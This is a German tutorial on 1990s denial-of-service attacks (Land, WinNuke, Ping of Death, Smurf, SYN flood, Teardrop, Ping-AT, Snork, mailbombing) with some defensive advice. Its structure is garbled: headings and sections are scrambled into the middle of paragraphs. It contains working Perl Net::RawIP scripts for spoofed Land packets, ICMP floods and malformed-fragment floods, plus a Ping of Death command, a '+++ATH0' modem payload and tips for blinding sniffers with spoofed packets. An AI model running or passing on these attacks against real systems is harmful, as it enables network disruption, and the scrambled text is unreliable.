1.0 Inhaltsverzeichnis2.0 Einführung3.1 Angriffsmöglichkeiten4.0 OOB (Out of Band)5.0 IP-Fragmentierung (Ping of Death)
5.1 Angriffsmöglichkeiten6.0 Smurf10.1 Schutzmöglichkeiten11.0 Mailbombing, Spam, Junk-Mail11.1 Die Geschichte des Spam
Denial of Service ist ein Synonym für die Kunst bzw. den Unsinn des Verhinderns eines Zugriffs oder Nutzens eines Computers. Denial of Service bedeutet soviel wie etwas unzugäglich machen, oder ausser Betrieb setzen. Diese Attacken nutzen immer Bugs und Schwachstellen von Programmen, Betriebssystemen oder Fehlimplementationen von Protokollen aus. Es existieren daher auch verschiedene Formen einer DoS-Attacke.3.0 LandEntgegen der allgemein gültigen Meinung können auch Netzwerkscanner, Sniffer und IDS (Intrusion Detect Systeme) von solchen Angriffen betroffen sein. Der Grund dafür ist, dass Sniffer stets auf dem Kernel des Betriebssystems aufbauen, und somit von ihm abhängig sind. Sniffer müssen einen eigenen TCP/IP-Stack besitzen, da ihnen sonst das Ausführen eines Trace einer Netzwerkverbindung verwehrt bleiben würde. Die meisten freien und kommerziellen Scanner haben dabei ein kleines Problem: Sind sie auf Spurenverfolgung einer Verbindung, so sind sie nicht mehr in der Lage, andere Verbindungen gleichzeitig zu observieren. Um diese Aufgabe bewältigen zu können, müssten sie gleichzeitig die Arbeit aller TCP/IP-Stacks im Netzwerk auf sich nehmen, wobei dies von der Rechenleistung einer einzelnen CPU nicht verlangt werden kann. Daher entgeht ihnen stets ein grosser Prozentsatz des gesamten Traffics.
Ein Angreifer muss sich bei einer dynamischen Attacke stets auf zwei Rechner beschränken, wie dies bei aktiven IDS (Intrusion Detection Systeme) der Fall ist. Sniffer und Netzwerkscanner, die auf einem Server zur Überwachung eines einzelnen Ports abgerichtet sind, können mit einem einfachen Trick sillgelegt werden: Bevor er sich zum Beispiel via Telnet auf Port 23 einloggt, sendet er ein gespooftes SYN-Paket. Falls ein Sniffer nun aktiv ist, wird er logischerweise nach Erhalt und Analyse des gespooften Pakets die Verbindung auf Port 23 im Auge behalten. So kann sich der Angreifer danach einloggen, ohne dass der Sniffer das Passwort mitscannen kann. Nach einer gewissen Zeit, wenn der TCP/IP-Stack die Verbindung aufgrund des Timeouts kappt, ist der Sniffer wieder regulär aktiv.
Ein weiteres Problem besteht darin, dass ein Sniffer nicht wirklich in eine Verbindung hineinschauen kann. Er nimmt also am Datenaustausch nicht bei, wie das bei den beiden beobachteten Rechnern der Fall ist. Er trifft aus diesen Gründen bezüglich IP- und TCP-Paketlänge bestimmte Annahmen und interpretiert die Pakete nach diesem Standartschema. Wird nun eine Änderung bezüglich der Länge des TCP-Headers und der sporadischen Einschleusung von falschen Prüfsummen vorgenommen, die nicht mehr der zuvor errechneten Länge entsprechen, kann er die Inhalte der Pakete nicht mehr korrekt interpretieren. Der Sniffer überprüft die TCP-Prüfsummen nicht mehr, wobei die Kernel der betroffenen Systeme diese "falschen" Pakete einfach verwerfen werden und somit die Übertragung korrekt ausführen. Sniffer brechen zum Teil auch nach einem FIN- oder RST-Paket ihre Überwachung ab. Befindet sich einer dieser jedoch in einem TCP-Paket mit weit entfernter Sequenznummer, so werden die zu überwachenden Rechner dieses verwerfen und mit ihrer Übertragung normal fortfahren. Der Sniffer hingegen hält die Verbindung für beendet, und er stellt seine Arbeit ein. Manche Betriebssysteme, wie zum Beispiel Windows NT und Digital Unix, überprüfen bei einem RST die TCP-Sequenznummern nicht. Sind also auf einem solchen System Sniffer aktiv, ist es einem Angreifer leicht möglich, diese mit einem gespooften Paket mit gesetztem RST-Flag in einen passiven Zustand für die kommenden Pakete zurückzusetzen.
Diese Angriffsart ist seit Ende 1997 bekannt, und es handelt sich hierbei um eine der letzten Varianten der DoS-Attacken, welche beachtliche Popularität erlangte. Durch die Land-Attacke wird ein sehr komplexer Angriff ausgeführt, welcher ein SYN-Paket mit identischer Absender- und Empfängerport erzeugt. Anschliessend wird dieses Paket an einen offenen Port gesendet, wo das Paket durch die vielen IP-Stacks eine Art Race-Condition erzeugt, und dadurch das System des Opfers lahmlegt.4.0 OOB (Out of Band)Hier nun einige Beispiele für Land-Angriffe:3.2 Schutzmassnahmen#!/usr/bin/perl
require 'getopts.pl';
use Net::RawIP;
Getopts('i:p:');
$a = new Net::RawIP;
die "Usage $0 -i <target> -p <target port>" unless
($opt_i && $opt_p);
$a->set({ ip => {saddr => $opt_i,
daddr => $opt_i
},
tcp=> {dest => $opt_p,
source => $opt_p,
psh => 1,
syn => 1}
});
$a->send;Die Flags (psh, syn,...) können beliebig im vorgegebenen Rahmen verändert werden, wobei bei korrekten Kombinationen Windows NT-Cluster (Tandem, Wolfpack,...) aussteigen.
Eine andere Möglichkeit besteht in einem simpel erscheinenden Ping:
#!/usr/bin/perl
use Net::RawIP qw(:pcap);
$a = new Net::RawIP ({icmp =>{}});
$a->set({ip => {saddr => 'www.intra.net', # insert your site
here !
daddr => $ARGV[0]},
icmp => {type => 8, id => $$}
});
$device = 'eth0'; # insert your device here !
$filt = 'ip proto \\icmp and dst host my.site.lan';#
insert your site here!
$size = 1500;
$tout = 30;
$pcap = $a->pcapinit($device,$filt,$size,$tout);
$i =0;
if(fork){
loop $pcap,-1,\,\@a;
}
else{
sleep 2;
for(;;){
$a->set({icmp => {sequence => $i,data => timem()}});
$a->send(1,1);
$i++
}
}
sub dmp{
my $time = timem();
$a->bset(substr($_[2],14));
my @ar = $a->get({ip => [qw(ttl)], icmp=>[qw(sequence
data)]});
printf("%u bytes from %s: icmp_seq=%u ttl=%u time=%5.1f
ms\n",length($ar[2])+8,
,$ARGV[0],$ar[1],$ar[0],($time-$ar[2])*1000);
}Folgender Quelltext kann unter Umständen seinen Sinn verlieren, da sich verschiedene Unix-Distributoren, darunter Linux 2.2 und BSD, dass dank einem Prüfsummencheck im eigenen Betriebssystem bösartige Pakete die eigene Netzwerk-Device nicht verlassen dürfen. Um die Wirkung des Quelltextes zurückzugewinnen, muss unter Linux der direkte Zugriff der Device im Kernel durch das Setzen der Y-Flag von "Socket" und "Config Netlink Socket" erfolgen. Dadruch haben jedoch auch einfach User des Systems Zugriff auf die Netzwerkdevice. Diese Option sollte man als Systemadministrator stets deaktiviert haben, da sonst User Angriffe vom eigenen WWW-Server mittels CGI-BINs fahren können.
Mit folgendem Beispiel wird ein weiterer Angriff gestartet, wobei "saddr" und die TCP/IP-Flags zu varriieren sind:
#!/usr/bin/perl
require 'getopts.pl';
use Net::RawIP;
Getopts('t:n:');
die "Usage $0 -t <ip of the target> -n <thousands of the
times>" unless ($opt_t && $opt_n);@data = split (//,"0"x20);
$p = new Net::RawIP({
ip => {
ihl => 11,
tot_len => 44,
tos => 0,
ttl => 255,
id => 1999,
frag_off => 16383,
protocol => 17,
saddr => '1.1.1.1',
daddr => $opt_t
},
generic => {}
});
$p->optset(ip => { type => [@data] , data => [@data] });
$p->send(0,$opt_n*1000);Die Auswirkungen waren relativ begrenzt, da viele Rechner schon durch Updates, Patches und Bug-Fixes gegen andere DoS-Attacken geschützt waren, und die verschiedenen Systemadministratoren gewisse Vorkehrungen trafen, um auch diese Attacke wirkungslos erscheinen zu lassen. Eine Besonderheit von Land war jedoch, dass die weit verbreiteten, und oft an zentralen Knotenpunkten der Netze installierten Cisco-Router von den Attacken betroffen waren.Grunsätzlich sei gesagt, dass solche Test-Angriffe grundsätzlich in isolierten lokalen Netzwerken ausgeführt werden sollten, dagerade Pakete, die fehlerhafte Prüfsummen generieren, innerhalb einer Collision Domain viele TCP/IP Stacks von Arbeitsstationen oder insbesondere auch Netzwerkdruckern zum Absturz bringen können. Alle diese Pakete lassen sich z.B. auch mit der Broadcast Adresse 255.255.255.255 als Zieladresse oder mit Multicast-Adressen (224.255.255.255) generieren. Diese werden dann eventuell auch in benachbarte Netze übertragen, weil eventuell ein VLAN-Switch diese überträgt.
Das folgende Skript ist völlig harmlos, weil es nur die Flags des TCP-Stacks abfragt. Es kann dazu dienen, das Betriebssystem hinter einer Firewall zu bestimmen, solange diese keinen eigenen TCP/IP-Stack besitzt, bzw. die Pakete als Stateful Paket Filter (SPF) einfach nur an einer Seite durchgereicht werden. Mit diesem Script kann erkannt werden, wie unterschiedlich Firewalls arbeiten, und wozu so eventuell nichts taugen bzw. ihre Kosten gerechtfertigt sind:
#!/usr/bin/perl
# Simple script for educational purposes
# It prints to STDOUT flags tcp packets from ftp server and clientuse Net::RawIP;
require 'getopts.pl';Getopts('i:d:n:');
die "Usage $0 -i <ftp server> -d <eth device> -n <number packet for receive>"
unless ($opt_d && $opt_d && $opt_n);print "Now please login to your ftp server\n";
@flags = qw/URG ACK PSH RST SYN FIN/;
$filter = "dst host $opt_i and dst port 21";
$filter1 = "src host $opt_i and src port 21";
$psize = 1500;
$device = $opt_d;
$timeout = 500;if(fork()){
$a = new Net::RawIP;
my $pcap = $a->pcapinit($device,$filter,$psize,$timeout);
loop $pcap,$opt_n,\,\@a;
}
else {
$b = new Net::RawIP;
my $pcap = $b->pcapinit($device,$filter1,$psize,$timeout);
loop $pcap,$opt_n,\,\@a;
}sub cl {
$a->bset(substr( $_[2],14));
my @fl = $a->get({tcp=>
[qw(psh syn fin rst urg ack)]
});
print "Client -> ";
map { print "$flags[$_] " if $fl[$_] } (0..5);
print "\n"
}sub sv {
$b->bset(substr( $_[2],14));
my @fl = $b->get({tcp=>
[qw(psh syn fin rst urg ack)]
});
print "Server -> ";
map { print "$flags[$_] " if $fl[$_] } (0..5);
print "\n";
}System-Administratoren sollten ihre Router im Intranet stets so konfigurieren, dass Broadcast-Domains möglichst klein bleiben. Leider könnte es passieren, dass Windows NT-PDCs und -BDCs in grossen Netzwerken nicht mehr korrekt funktionieren. Entweder man setzt dann in jeder Abteilung Firewalls ein, die einen eigenen TCP/IP Stack besitzen, oder man schafft NT-Server im Unternehmen grundsätzlich ab.
OOB (Out of Band) ist ein Feature von TCP (Trasmission Control Protocol) das es erlaubt, Daten auserhalb der Reihenfolge (out-of-band) zu senden. Dies ist zum Beispiel nützlich für die Behandlung von [Ctrl]+[C] in Telnet-Verbindungen. Weniger nützlich wenn am anderen Ende was ausreichend altes von Microsoft hängt - dieses mag OOB-Daten an vielen Stellen garnicht.5.0 IP-Fragmentierung (Ping of Death)Schuld an der Möglichkeit einer solchen Attacke war die fehlerhafte Implementierung von NetBEUI durch Microsoft: Sobald über die Ports 135 und 139 ein paar Daten oder wirre Zeichen eintrafen, die nicht der Norm entsprachen, stürzte das betroffene System ab.
Das erste OOB-Tool war WinNuke, und erblickte laut verschiedenen Quellen am 7. Mai 1997 die Welt. Durch IRC (Internet Relay Chat) und verschiedene Newsgroups erreichte WinNuke bald eine gewisse Popularität und Verbreitung. OOB-Attacken verlieren jedoch zunehmends an Bedeutung, da Windows 98 und 2000 gegen solche Angriffe bereits gefeilt ist. Bei Windows 95 und NT mussten noch Updates installiert werden, um diese Attacke wirkungslos erscheinen zu lassen.
Erschreckend ist ganz sicher die unglaubliche Einfachheit und Primitivität dieses Fehlers, der dazu führte, dass es in kürzester Zeit eine Unmenge von OOB-Nuke-Tools gab. Die OOB-Nuker wurden stetig perfektioniert: So konnte man neben Massen-Nuke auch "Abschiessgründe" senden und anschliessend sogar verifizieren lassen, ob der Rechner des Opfers tatsächlich crashte, indem versucht wurde der Zielrechner mit einem ICMP-Ping zu erreichen.
Ein einzelnes IP-Paket ist inklusive Header maximal 65'535 Bytes lang, Ethernet-Pakete können jedoch maximale 1'500 Bytes Daten übertragen. Grössere Pakete werden fragmentiert und beim Empfänger wieder defragmentiert, wobei die Zusammensetzung anhand eines Offset-Wertes erfolgt. Dies wird gemacht, um Netzwerkabschnitte zu überwinden, welche lediglich eine maximale Paketlänge unterstützen. Jedes Paketfragment erhält neben dem Offset-Wert auch noch eine Identifikationsnummer, aber nur das erste enthält den TCP-Header und damit die Port-Nummer. Dieser Offset-Wert bestimmt für jedes Fragment, wohin es gehört oder wohin es soll. Dadurch ist es möglich, dem letzten Fragment einen Offset zu geben, der inklusive Fragmentgrösse einen grösseren Wert als die maximalen 65'535 Bytes ergibt. Dieses übergrosse Ping-Paket erzeugt anschliessend einen Buffer-Overflow. Dieser Angriff funktioniert nicht nur mit ICMP und Ping, sondern auch mit UDP und TCP. Obwohl ein ordentlicher Ping-Befehl keine Pakete grösser als 65'507 Bytes (65'535 Bytes abzüglich 20 Bytes IP-Header und 8 Bytes ICMP-Header) zulässt, bot bei den ersten Versionen von Windows 95 der dort implementierte Ping-Befehl das antsprechende Feature in Form eines Parameters. Einfach "ping -l 65510 zielhost" eingeben, und der Todes-Ping wird ausgeführt.6.0 SmurfAls eine der erfolgreichsten Angriffsmöglichkeiten gegen Sniffer sind solche mit fragmentierten IP-Paketen. TCP-Filter können auch in der Regel nicht mehr sicher unterscheiden, ob die Paket ins interne Netz gelassen werden dürfen, da die Port-Information bei den meisten Paketen fehlt. Wenn die Zielstation nun auch noch unvollständige Paketfragmentfolgen auswertet - und jene auch nicht verwirft - kann eine Firewall ohne grössere Probleme umgangen werden.5.2 SchutzmassnahmenEin einfacher aber wirkungsvoller Angriff, der IP-Fragmentierung ausnutzt, ist der sogenannte "overlapping fragment attack" nach RFC 1858. Die derzeitige
Internet-Protokoll Spezifikation RFC 791 beschreibt einen Reassemblierungs-Algorithmus, der neue Fragmente produziert und dabei jeden überlappenden Teil der
zuvor erhaltenen Fragmente überschreibt. Wird ein solcher Algorithmus angewendet, so kann ein Angreifer eine Folge von Paketen konstruieren, in denen das erste Fragment (mit einem Offset der Länge Null) harmlose Daten beinhaltet (und dadurch von einem Paketfilter weitergeleitet werden kann). Ein beliebiges nachfolgendes Paket mit einem Offset, der größer als Null ist, könnte TCP-Header-Informationen (z.B. destination port) überlappen. Diese würden durch den Algorithmus modifiziert (überschrieben). Dieses zweite Paket wird von vielen Paketfiltern nicht gefiltert. Gegenmaßnahme hierzu ist, Paketfilter zu verwenden, die ein Minimum an Fragment Offset für Fragmente verlangen. Nur wenige neuere TCP/IP-Stacks erkennen dieses Problem und korrigieren dieses. Ältere Router lassen sich mit diesem Trick einfach durchtunneln, sie bieten keinen Schutz. Besonders aber Firewalls, die auf der Basis der Stateful Paket Filterung (SPF) arbeiten, wie z.B. RAPTOR EAGLE und FIREWALL-1 liessen sich so durchtunneln. Content-Anbieter im Internet und ISP´s, die mit diesen Firewalls NT-Server schützen wollten, wurden so Ziel der unzähligen Angreifer, die neue Exploits mal testen wollten.Anfang 1997 war von dieser Attacke so ziemlich alles betroffen, was einen IP-Stack hatte. Von der Workstation bis zum Drucker war damals praktisch nichts dagegen gewappnet. Abhilfe schafft nur eine vollständige Reassemblierung der TCP/IP-Pakete oder der Einsatz eines Proxy. Nachteil dieser Lösung ist ein enormer Einbruch in der Performance, der den Vorteil der SPF-Firewalls völlig zunichte macht. Dies zeigt aber, daß Firewalls keineswegs perfekt sind. Will man solchen Angriffen zuvorkommen, so ist man als Betreiber eines mission critical Systems auf die ständige Betreuung eines Experten angewiesen. Da von diesem Angriff nur spoofende Versionen existieren, können die Täter oft nicht aufgespürt werden.
Wenn man auf eine Broadcastadresse einen Ping schickt, erzeugt dieser je nach antwortendem Rechner eine beachtliche Anzahl an Antworten. Der Trick besteht darin, die Absenderadresse zu fälschen, so dass das Opfer die Antworten erhält. Sendet man nun rund 1'000 Pakete pro Sekunde, und 1'000 Rechner ant-worten darauf, bedeutet dies also, dass 1'000'000 Pakete pro Sekunde beim Opfer eintreffen. Die verursacht einen solchen Traffic, dass der Rechner des Opfers unter dem enormen Verkehr zusammenbricht.7.0 SYN-FloodingDieses Problem war unter dem Namen "ICMP Storm" schon länger bekannt, gewann jedoch erst durch das im Oktober 1997 erscheinende Tool "Smurf" an Bedeutung für Datenreisende.
Zahlreiche Provider wurden durch solche Attacken tagelang arg bedrängt. Dieses Problem lässt sich jedoch durch einen einfachen Trick beheben, indem man an den Routern die IP-Broadcasts nicht mehr in Ethernet-Broadcasts umsetzen lässt, und jene somit Aussen vor bleiben.
TCP-Verbindungen werden nach einem Drei-Wege-Handshake aufgebaut, indem zuerst ein SYN-Paket gesendet wird, darauf mit einem SYN/ACK-Paket geantwortet wird, und anschliessend die Bestätigung mittels eines ACK Bestätigung findet.8.0 TeardropNun besteht die SYN-Flood-Attacke daraus dem Opfer beim Handshake eine falsche Absenderadresse zu übermitteln. Das SIN/ACK-Antwortpaket wird also ins Nirgendwo beantwortet. Wenn nach einiger Zeit keine Rückantwort des ACK-Paketes erfolgt, wird der Verbindungsversuch als erfolglos abgebrochen. Nutzt man jedoch nun die Zeit bis zum Abbruch damit, dem Opfer eine Unmenge von SYN-Paketen zu schicken, und ihn somit zu überfluten, wird der Rechner des Opfers in die Knie gehen.
Hier ein Beispiel eines solchen Konversation:
Diese Flood-Attacke erlebte besonders im Herbst 1996 grossen Aufschwung.Der Angreifer sendet das Paket SYN 1 an sein Opfer. Das Opfer antwortet automatisch auf SYN 1 und wartet auf ACK 1. Der Angreifer sendet SYN 2. Das Opfer antwortet auf SYN 2, wartet nun auf ACK 1 und ACK 2. Der Angreifer sendet nun Paket SYN 3. usw. ...
Nahezu wie der "Ping of Death" macht sich "Teardrop" die Fragmentierung von IP-Paketen zunutze. Während beim "Ping of Death" eine übergrosse Fragmentierung erzeugt wird, überlappen sich die Fragmente bei einer Teardrop-Attacke einfach, und bringen so Windows und Linux ins Schwitzen, und schlussendlich zum Crash.9.0 Ping-AT-AttackeAuch diese Attacke wurde gegen Ende 1997 besonders oft gesichtet.
Dem Schrecken wurde aber schnell mit Patches und Updates ein Ende gesetzt.
Der amerikanische Modemhersteller Hayes hat Ende der siebzigerjahre eine einheitliche, zeilenorientierte und öffentliche Befehlssprache für Modems entwickelt, welche die sogenannten AT-Befehle enthält. Durch diese Befehle wird es möglich, dass jedes Modem angesprochen werden kann, in welches diese einheitliche Sprache implementiert wurde. Man kann sagen, dass dies heute praktisch bei allen Modems der Fall ist, so dass jene Modems von den Betriebssystemen und der Software einheitlich angesprochen werden kann. Sobald sich ein Modem im Offline-Modus befindet, kann es über AT-Befehle angesprochen werden. Findet ein Wechsel in den Online-Modus statt, kann das Modem nicht mehr mittels der AT-Befehle angesprochen werden, da es sich im Übertragungsmodus befindet. Dies kann verhindert werden, indem man dem Modem die Zeichenkette des dreimaligen Drückens des Escape-Zeichens sendet, welches als "+++" gekennzeich-net wird. Dabei wird in den Kommandomodus gewechselt. Aus Sicherheitsgründen muss zwischen diesem Umschaltkommando in den Kommandomodus und den ersten AT-Befehl mindestens eine Pause von einer Sekunde vorhanden sein. Einige Modemhersteller vezichten aus patentrechtlichen Gründen auf eine solche Pause, so dass bei jenen Modellen der Umschaltbefehl in den Kommandomodus und ein kompletter AT-Befehl direkt hintereinander eingegeben werden können. Diese Voraussetzung eignet sich für einen gemei-nen Angriff: Man schicht an einen Empfänger über das Internet ein spezielles Ping-Paket, welches zum Bei-spiel die Sequenz "+++ATH0" enthält, was das Umschalten in den Kommandomodus und Beenden der Ver-bindung bedeutet. Laut Ping-Protokoll antwortet der Rechner des Empfängers auf die Ping-Anfrage mit der Spiegelung des Paketes. Kennt das Modem nun die oben genannte Pause zwischen dem Umschalten und dem darauffolgenden AT-Paket nicht, wird es den Paketinhalt des Antwort-Pings als abzuarbeitende Sequenz interepretieren, und die Verbindung trennen.10.0 Snork
Ende September des Jahres 1998 machte die ISS X-Force auf http://xforce.iss.net/alerts/advise9.php3 auf eine neue DoS-Attacke gegen den Windows NT RPC-Service aufmerksam, welche vom Aufbau her vergleichbar mit den Attacken "Smurf" und "Fraggle" ist. Diese Attacke erlaubt es einem Angreifer mit minimaler Ausstattung einem entfernten Windows NT-Rechner 100 % der Prozessor-Leistung und einen grossen Anspruch der Bandbreite zeitweilens in Anspruch zu nehmen. Die Verwundbarkeit für Snork ist auf Windows NT 4.0 Workstations und Servern bis und mit Service-Pack SP4 RC 1.99 vorhanden.
10.1 Schutzmöglichkeiten11.0 Mailbombing, Spam, Junk-MailMicrosoft hat einen Patch gegen diese Attacke herausgegeben, der sich unter http://www.microsoft.com/security/bulletins/ms98-014.htm findet. Netzwerkadministratoren können interne Systeme von externen Attacken abschirmen, indem folgende Filter-Regel im Router oder der Firewall eingegeben wurde: Alle einkommenden UDP-Pakete filtern, die den Destinations-Port 135 und als Source-Port 7, 19 oder 135 haben. Viele Firewall-Komponenten haben diese Regel schon aktiviert, und sind deshalb schon out of the box gegen Snork-Attacken gerüstet.
11.1 Die Geschichte des SpamSpam gilt heute als den Erhalt unerwünschter (Werbe-)Sendung in Form von E-Mails. Doch früher würde dieser Ausdruck in den Gefilden des Usenets gebraucht: Dort wurde damals das Erzwingen des physikalischen Speicherns ein und der selben Nachricht auf verschiedenen News-Servern so genannt.11.2 Die Lage heuteMailbombing ist zusammen mit OOB-Attacken eine der populärsten Formen der DoS-Attacken und wird vorzugsweise von meist jugendlichen Tätern im Alter zwischen 14 und 18 Jahren ausgeübt. Dabei wird entweder eine enorm grosse Nachricht in Form einer E-Mail an die Zieladresse geschickt, oder mit tausenden von Nachrichten bombadiert. Die dadurch erreichbaren Ziele sind das Verstopfen eines bestimmten Mail-Accounts, oder gleich das Verlangsamen oder gar Herunterreissen eines Mail-Servers. Solche Mail-Bombing-Attentate können ohne grössere Probleme durch im Internet erhältliche Programme durchgeführt werden.11.3 SchutzmöglichkeitenAls erstes sollte im Netz nur ungern die private Mail-Adresse publuziert werden. Öffentliche Auftritte sollten höchstens mit der Angabe einer sekundären Mail-Adresse bei einem Free-Mail-Anbieter, wie zum Beispiel yahoo.de, hotmail.de oder gmx.ch quittiert werden. Dadurch erschliesst sich der Vorteil, dass die Hauptadresse möglicherweise keinen Attacken standhalten muss. Ein vollgemüllter Free-Mail-Account lässt sich auch ohne grössere Probleme säubern oder notfalls ganz löschen.Eine weitere Schutzmassnahme ist das Filtern eingehender Mails. Am besten sollte dies schon beim Mail-Gateway durchgeführt werden, falls im Unternehmen ein solcher vorhanden sein sollte. Die Filterrregeln lassen sich bei zeitgemässen Programmen relativ komfortabel einstellen: So können zum Beispiel bestimmte Absender, Betreff- oder Mail-Inhalte boykottiert werden. Um unnötigen Traffic und mögliche Drittpersonen nicht unnötig zu belasten, sollten keine Strike-Back-Attacken oder Error-Replies genutzt werden, denn meist nutzen Angreifer gestohlene oder fiktive Absender-Adressen, die solche Antworten gar nicht honorieren würden.